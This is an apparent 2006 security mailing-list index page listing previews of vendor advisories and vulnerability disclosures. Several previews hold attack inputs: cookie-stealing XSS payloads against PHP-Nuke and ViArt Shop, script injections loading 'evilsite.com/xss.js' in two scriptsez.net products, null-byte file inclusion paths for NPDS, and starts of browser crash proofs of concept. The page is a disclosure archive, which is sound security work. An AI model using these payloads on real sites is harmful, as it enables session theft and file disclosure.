|
Colapse all |
Post message
[USN-289-1] tiff vulnerabilities 2006-06-08 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-289-1 June 08, 2006 tiff vulnerabilities CVE-2006-2193, CVE-2006-2656 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 [ more ] [ reply ] Ie opera dos exploit 2006-06-08 co296 aol com Guy's the marquee tag dos exploit also afest's ie and opera also here is proof of concept credit's n00b and all that helped. This is for opera and ie. <html> <head> <style> </style> <title>Ie voulnrability credit's to n00b and every-one who helped.</title></head> <body onload="javascript: [ more ] [ reply ] bug of script injection in shoutcast servers 2006-06-08 mantasjadzevicius vecro lt Vulnerable Systems: All shoutcast servers!! I found an error in shoutcast server. Then I'm connecting to the server I type in the DJ columns( you can type in all columns) for exmple script pvz.: <script>alert("boo");</script> <script>location.href="google.com";</script> or else... So then [ more ] [ reply ] [SECURITY] [DSA 1091-1] New TIFF packages fix arbitrary code execution 2006-06-08 joey infodrom org (Martin Schulze) PHP-Nuke <= 7.9 Search XSS Vulnerability 2006-06-08 try_og hotmail com # PHP-Nuke <= 7.9 Search module XSS Vulnerability # It could work on later versions if PHP-Nuke does not patch it. 1: Enter: http://[host]/modules.php?name=Search 2: Search for: "><body onload="alert(document.cookie) // You'll get a javascript alert with your cookie in it. # Credits: O.G. [ more ] [ reply ] Back-end = 0.7.2.1 (jpcache.php) Remote command execution 2006-06-07 Federico Fazzi (federico autistici org) / Federico Fazzi, <federico (at) autistici (dot) org [email concealed]> */ Back-end = 0.7.2.1 (jpcache.php) Remote command execution */ 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $_PSL['classdir'] . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execu [ more ] [ reply ] NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure 2006-06-08 gmdarkfig gmail com // Script Web -------- www.npds.org versions --- NPDS <= 5.10 Solutions -- None official Note ------- Vendor has been contacted // Local Inclusion http://[...]/header.php?Default_Theme=../apache/logs/error.log%00 http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../ ../apa [ more ] [ reply ] Mathcad Area Lock Vulnerability 2006-06-08 bugtraq firewraith co uk Description of Vulnerability ============================ One of the features of Mathcad (www.mathsoft.com) is allowing the user to define ?Areas?. Mathsoft say that ?You can use areas to protect, lock, or hide information or equations in your worksheets? and that ?You can also protect the content [ more ] [ reply ] Uninformed Journal Release Announcement: Volume 4 2006-06-08 Uninformed Journal (sflist digitaloffense net) Uninformed is pleased to announce the release of its fourth volume. The articles included in this volume are: - Engineering in Reverse: Improving Automated Analysis of Windows x64 Binaries Author: skape - Exploitation Technology: Exploiting the Otherwise Non-exploitable on Windows Authors: Sk [ more ] [ reply ] Internet Explorer vulnerbility 2006-06-08 Mr Niega gmail com /* * * Internet Explorer Crash [Proof of concept] * Bug discovered by MarjinZ & Mr.Niega * http://www.swerat.com/ * * Affected Software: Internet explorer * Severity: Unknown * Impact: Crash * Solution Status: Unpatched * * E-Mail: Mr.Niega (at) gmail (dot) com [email concealed] & MarjinZ (at) gmail (dot) com [email concealed] * __ __ _ [ more ] [ reply ] [SECURITY] [DSA 1092-1] New MySQL 4.1 packages fix SQL injection 2006-06-08 joey infodrom org (Martin Schulze) rPSA-2006-0098-1 gdm 2006-06-08 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0098-1 Published: 2006-06-08 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Local System User Deterministic Privilege Escalation Updated Versions: gdm=/conary.rpath.com@rpl:devel//1/2.8.0.8-0.1-1 References: http://www.cve.mitre.org/c [ more ] [ reply ] GUESTEX guestbook code execution 2006-06-08 root (root xzziroz net) Another hole found while mass auditing free cgi scripts. After finding it and writing code for it I noticed there is already a a BID (http://www.securityfocus.com/archive/1/425970), but no code. So, here is some code. Maybe this will further provoke the author to get it fixed. --K-sPecial ## Creato [ more ] [ reply ] Ez Ringtone Manager from scriptez.net - XSS 2006-06-08 luny youfucktard com Ez Ringtone Manager Homepage: http://www.scriptsez.net Effected files: player.php search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC= http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles The search box doesnt properlly fil [ more ] [ reply ] MiraksGalerie <= 2.62 Multiple Remote command execution 2006-06-07 Federico Fazzi (federico autistici org) */ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]> */ MiraksGalerie <= 2.62 Multiple Remote command execution */ 07/06/2006 4:58 Bug: pcltar.lib.php: line 34 - 35 --- if (!isset($g_pcltar_lib_dir)) $g_pcltar_lib_dir = "lib"; [etc..] --- galimage.lib.php: line: 157 - 158 --- for($i=count($listconfi [ more ] [ reply ] [SECURITY] [DSA 1093-1] New xine-ui packages fix denial of service 2006-06-08 joey infodrom org (Martin Schulze) [ GLSA 200606-06 ] AWStats: Remote execution of arbitrary code 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [NOBYTES.COM: #12] ViArt Shop v2.5.5 - XSS Vulnerability 2006-06-07 John Cobb (johnc nobytes com) ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise) Authors Site: http://www.codetosell.com/ +-[Examples:]--------------------------------------------------+ XSS: /forum.php?forum_id="><script>alert('XSS');</script>&category_id=1 /reviews.php?category_id=0&item_id=4&rnd=114961 [ more ] [ reply ] Easy Ad-Manager 2006-06-08 luny youfucktard com Easy Ad-Manager v. (unknown, not listed on homepage) Homepage: http://www.scriptsez.net Effected files: details.php XSS Vulnerability with full path disclosure: http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http: //evilsite.com/xss.js></SCRIPT> Warning: fopen(sta [ more ] [ reply ] |
|
Privacy Statement |
http://index.php?STYLE_URL=<script>;alert(soot);</script>
[ more ] [ reply ]